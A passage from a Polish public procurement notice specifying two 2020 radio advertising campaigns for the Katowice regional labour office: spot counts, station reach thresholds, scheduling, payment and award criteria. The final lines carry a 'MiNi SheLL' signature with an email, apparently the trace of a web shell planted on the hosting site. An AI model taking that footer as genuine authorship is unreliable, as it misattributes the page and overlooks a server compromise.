Katowicach w ramach Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014 – 2020 (PO WER 2014 - 2020) obejmującej 600-krotną emisję 2 spotów o długości max. 30 sek. każdy.I.	Cel zamówienia: Promocja możliwości i/lub efektów wsparcia w ramach PO WER 2014- 2020 oraz zachęta do skorzystania z projektów finansowanych z EFS.II.	Zasięg kampanii: województwo śląskie.III.	Grupa docelowa kampanii: mieszkańcy woj. śląskiego, osoby w wieku 18-29 lat.IV.	Zakres usługi:1.	Opracowanie mediaplanu.2.	600-krotna emisja spotów w maksymalnie 6 stacjach radiowych. Zakłada się równomierną emisję każdego z 2 rodzajów spotów, tj. po 300 emisji.3.	Wydanie przez Wykonawcę oświadczenia o emisji spotów zgodnie z zaakceptowanym mediaplanem podpisanego przez osobę/osoby upoważnione oraz przekazanie metryczek spotów radiowych.V.	Szczegółowe założenia dotyczące emisji spotów:1. Usługa obejmuje łącznie 600 emisji 2 spotów promujących wsparcie dla osób młodych na rynku pracy w ramach PO WER w maksymalnie 6 lokalnych lub regionalnych stacjach radiowych nadających w woj. śląskim, których zasięg dzienny zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: październik 2019 - marzec 2020 w grupie docelowej osób w wieku 18-29 lat wynosi co najmniej:a) dla regionu katowickiego: minimum 6,8% - 150 emisji,b) dla regionu częstochowskiego: minimum 5,7% - 150 emisji,c) dla regionu bielskiego: minimum 3,1% - 150 emisji,d) dla Okręgu Rybnickiego: minimum 5,2% - 150 emisji2. Proponowane stacje radiowe będą weryfikowane na podstawie raportu z badań słuchalności radiowej Radio Track, który stanowi załącznik do SIWZ. Stacje radiowe należy wybrać spośród tych, które spełniają minimalny wskaźnik słuchalności radiowej wskazany w niniejszym opisie przedmiotu zamówienia. 3. Z każdego regionu należy wybrać co najmniej jedną, maksymalnie dwie stacje (łącznie nie więcej niż 6 stacji), które spełniają wymóg minimalnego wskaźnika słuchalności radiowej, przedstawionego w niniejszym opisie przedmiotu zamówienia. Stacje radiowe proponowane dla poszczególnych regionów mogą się powtarzać pod warunkiem spełnienia warunku minimalnej słuchalności radiowej. Zakłada się równomierny rozkład liczby emisji w każdym regionie, dlatego jeśli w wybranym regionie emisja nastąpi w 2 stacjach radiowych, to w każdej z tych stacji należy założyć emisję w wysokości 75 emisji (łącznie 150 emisji w każdym regionie tj. po 75 w każdej z dwóch stacji).4. W jednym bloku reklamowym spot może zostać wyemitowany tylko raz. Emisje w dni powszednie oraz weekendy w godzinach 6.00 - 22.00, w tym 300 emisjiw godzinach premium tj. od 7.00 do 18.00 w dni powszednie oraz od 9.00 do 16.00w weekendy. Minimum 60 emisji spotów dziennie we wszystkich stacjach radiowych łącznie w ramach całej kampanii, równomierne rozłożenie emisji w całym tygodniu.VI.	Termin realizacji usługi: od podpisania umowy maksymalnie do 18 grudnia 2020 r. Przewiduje się emisję spotów w okresie od zaakceptowania mediaplanu przez Zamawiającego do 18 grudnia br. Wykonawca dostarczy oświadczenie o emisji spotów zgodnie z zaakceptowanym mediaplanem podpisanym przez osobę/osoby upoważnione.VII.	Szczegółowe założenia dotyczące współpracy podczas realizacji usługi:1.	Komunikacja w trakcie realizacji umowy pomiędzy Wykonawcą a Zamawiającym będzie się odbywała drogą mailową (przekazywanie materiałów takich jak np. media plan oraz jego akceptacja).2.	Spoty zostaną wyemitowane na podstawie zaakceptowanego przez Zamawiającego mediaplanu. Wykonawca w terminie do 2 dni roboczych od dnia podpisania umowy przekaże Zamawiającemu do akceptacji mediaplan w ramach kampanii. 3.	Zamawiający akceptuje mediaplan lub nanosi uwagi w terminie do 1 dnia roboczego od przekazania materiału. Wykonawca wprowadza ewentualne uwagi w terminie do 1 dnia roboczego od ich otrzymania od Zamawiającego.4.	Zamawiający przekaże Wykonawcy nagrania spotów na potrzeby emisji w dniu podpisania umowy.5.	Zapłata nastąpi na podstawie faktury w terminie 30 dni od daty jej dostarczenia do siedziby Zamawiającego. Warunkiem zapłaty za usługę jest dostarczenie przez Wykonawcę oświadczenia, że wszystkie nagrania zostały wyemitowane zgodnie z zaakceptowanym mediaplanem (wymagany jest podpis uprawnionego przedstawiciela Wykonawcy oraz pieczątka).6.	Wykonawca zapewni ze swojej strony Koordynatora - osobę odpowiedzialną za całość współpracy i kontakty z Zamawiającym podczas realizacji usługi.VIII.	Licencja:Zamawiający oświadcza, że na zasadzie wyłączności posiada roczną licencję na wyprodukowane spoty na następujące pola eksploatacji: radio, Internet, utrwalenie na nośnikach elektronicznych wykorzystywanych w dystrybucji bezpośredniej (m.in. płyty CD/DVD, pamięć USB).Wykonawca, który zlecać będzie wykonanie części zamówienia (np. opracowanie kluczy kodowych) Podwykonawcom na podstawie umowy w formie pisemnej o charakterze odpłatnym (art. 2 ust. 9a Pzp) zobowiązany jest do wykazania tego w pkt 12 Formularza ofertowego stanowiącego załącznik do niniejszej SIWZ dotyczącego Podwykonawcy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>92200000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 25238,50<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-18<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas emisji - liczba emisji w godzinach premium</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Kampania spotowa RPO WSL</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Kampania spotowa RPO WSLPrzedmiot zamówienia obejmuje realizację kampanii radiowej promującej działania Wojewódzkiego Urzędu Pracy w Katowicach w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 - 2020 (RPO WSL 2014 - 2020), obejmującej 900-krotną emisję 5 spotów o długości max. 30 sek. Każdy.I.	Cel zamówienia: Promocja możliwości i/lub efektów wsparcia w ramach RPO WSL 2014- 2020 oraz zachęta do skorzystania z projektów finansowanych z EFS.II.	Zasięg kampanii: województwo śląskie.III.	Grupy docelowe kampanii: 1. Mieszkańcy woj. śląskiego, osoby w wieku 25-65 lat,2. Mieszkańcy woj. śląskiego: właściciele firm, dyrektorzy, wolne zawody oraz pracownicy umysłowi.IV.	Zakres usługi:1.	Opracowanie mediaplanu.2.	Emisja 5 spotów radiowych dotyczących możliwości wsparcia w ramach RPO WSL:a) 1 spot promujący możliwości i/lub efekty wsparcia dla przedsiębiorstw - dofinansowanie do usług szkoleniowych i doradczych dla firm sektora MŚP i ich pracowników oraz b) 4 spoty promujące możliwości i/lub efekty wsparcia osób pracujących i poszukujących pracy w ramach RPO WSL.3.	Łącznie 900-krotna emisja 5 spotów radiowych. Zakłada się równomierną emisję każdego z 5 rodzajów spotów, tj. po 180 emisji.4.	Wydanie przez Wykonawcę oświadczenia o emisji spotów zgodnie z zaakceptowanym mediaplanem, podpisanego przez osobę/osoby upoważnione.V.	Szczegółowe założenia dotyczące emisji spotów:1. Usługa obejmuje łącznie 900 emisji 5 spotów radiowych, w tym:a) 180 emisji 1 spotu promującego możliwości i/lub efekty wsparcia dla przedsiębiorstw (wymienionego w poz. IV, pkt 1 lit. a)) w maksymalnie 6 regionalnych lub lokalnych stacjach radiowych nadających w woj. śląskim, których zasięg dzienny zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: październik 2019 - marzec 2020 w grupie docelowej: właściciele firm, dyrektorzy, wolne zawody oraz pracownicy umysłowi wynosi co najmniej:1) dla regionu obejmującego byłe woj. katowickie: minimum 5,9% - 45 emisji,2) dla regionu obejmującego byłe woj. częstochowskie: minimum 7,3 % - 45 emisji,3) dla regionu obejmującego byłe woj. bielskie: minimum 4,8% - 45 emisji,4) dla Okręgu Rybnickiego: minimum 3,9 % - 45 emisjib) 720 emisji 4 spotów (wymienionych w poz. IV, pkt 1, lit. b)) promujących wsparcie w ramach RPO WSL w maksymalnie 6 lokalnych lub regionalnych stacjach radiowych nadających w woj. śląskim, których zasięg dzienny zgodnie z badaniem Radio Track, realizowanym na zlecenie Komitetu Badań Radiowych, za okres: październik 2019 - marzec 2020 w grupie docelowej: osoby w wieku 25-65 lat, wynosi co najmniej:1) dla regionu obejmującego byłe woj. katowickie: minimum 5,9% - 180 emisji,2) dla regionu obejmującego byłe woj. częstochowskie: minimum 5,1% - 180 emisji,3) dla regionu obejmującego byłe woj. bielskie: minimum 3,1% - 180 emisji,4) dla Okręgu Rybnickiego: minimum 3,5 %- 180 emisji2. W jednym bloku reklamowym spot może zostać wyemitowany tylko raz. Emisje w dni powszednie oraz weekendy w godzinach 6.00 - 22.00, w tym minimum 450 emisji w godzinach premium tj. od 7.00 do 18.00 w dni powszednie oraz od 9.00 do 16.00 w weekendy. Minimum 90 emisji spotów dziennie łącznie we wszystkich stacjach radiowych w ramach kampanii, równomierne rozłożenie emisji w całym tygodniu. 3. Proponowane stacje radiowe będą weryfikowane na podstawie raportu z badań słuchalności radiowej Radio Track, który stanowi załącznik do SIWZ. Stacje radiowe należy wybrać spośród tych, które spełniają minimalny wskaźnik słuchalności radiowej wskazany w niniejszym opisie przedmiotu zamówienia. 4. Z każdego regionu należy wybrać co najmniej jedną, maksymalnie dwie stacje (łącznie nie więcej niż 6 stacji) , które spełniają wymóg minimalnego wskaźnika słuchalności radiowej, przedstawionego w niniejszym opisie przedmiotu zamówienia. Stacje radiowe proponowane dla poszczególnych regionów mogą się powtarzać pod warunkiem spełnienia warunku minimalnej słuchalności radiowej (jeśli stacja x spełnia wymóg progu słuchalności np. w regionie bielskim i katowickim, to można ją wybrać w tych dwóch regionach).5. Zakłada się równomierny rozkład liczby emisji w każdym regionie, dlatego jeśli w wybranym regionie emisja nastąpi w 2 stacjach radiowych, to w każdej z tych stacji należy założyć emisję w wysokości 90 emisji (łącznie 180 emisji w każdym regionie tj. po 90 w każdej z dwóch stacji dla danego regionu). VI.	Termin realizacji usługi: od podpisania umowy do 18 grudnia 2020 r. Przewiduje się emisję spotów w okresie od zaakceptowania mediaplanu przez Zamawiającego do 18 grudnia 2020 r. Wykonawca dostarczy oświadczenie o emisji spotów zgodnie z zaakceptowanym mediaplanem podpisanym przez osobę/osoby upoważnione najpóźniej do 18 grudnia 2020 r.VII.	Szczegółowe założenia dotyczące współpracy podczas realizacji usługi:1.	Komunikacja w trakcie realizacji umowy pomiędzy Wykonawcą a Zamawiającym będzie się odbywała drogą mailową (przekazywanie materiałów takich jak np. media plan oraz jego akceptacja).2.	Spoty zostaną wyemitowane na podstawie zaakceptowanego przez Zamawiającego mediaplanu. Wykonawca w terminie do 2 dni roboczych od dnia podpisania umowy przekaże Zamawiającemu do akceptacji mediaplan w ramach kampanii. 3.	Zamawiający akceptuje mediaplan lub nanosi uwagi w terminie do 1 dnia roboczego od przekazania materiału. Wykonawca wprowadza ewentualne uwagi w terminie do 1 dnia roboczego od ich otrzymania od Zamawiającego.4.	Zamawiający przekaże Wykonawcy nagrania spotów na potrzeby emisji w dniu podpisania umowy.5.	Zapłata nastąpi na podstawie faktury w terminie 30 dni od daty jej dostarczenia do siedziby Zamawiającego. Warunkiem zapłaty za usługę jest dostarczenie przez Wykonawcę oświadczenia, że wszystkie nagrania zostały wyemitowane zgodnie z zaakceptowanym mediaplanem (wymagany jest podpis uprawnionego przedstawiciela Wykonawcy oraz pieczątka).6.	Wykonawca zapewni ze swojej strony Koordynatora - osobę odpowiedzialną za całość współpracy i kontakty z Zamawiającym podczas realizacji usługi.VIII.	Licencja:Zamawiający oświadcza, że na zasadzie wyłączności posiada roczną licencję na wyprodukowane spoty na następujące pola eksploatacji: radio, Internet, utrwalenie na nośnikach elektronicznych wykorzystywanych w dystrybucji bezpośredniej (m.in. płyty CD/DVD, pamięć USB).Wykonawca, który zlecać będzie wykonanie części zamówienia (np. opracowanie kluczy kodowych) Podwykonawcom na podstawie umowy w formie pisemnej o charakterze odpłatnym (art. 2 ust. 9a Pzp) zobowiązany jest do wykazania tego w pkt 13 Formularza ofertowego stanowiącego załącznik do niniejszej SIWZ dotyczącego Podwykonawcy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>92200000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 38893,50<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-12-18<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Czas emisji - liczba emisji w godzinach premium</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com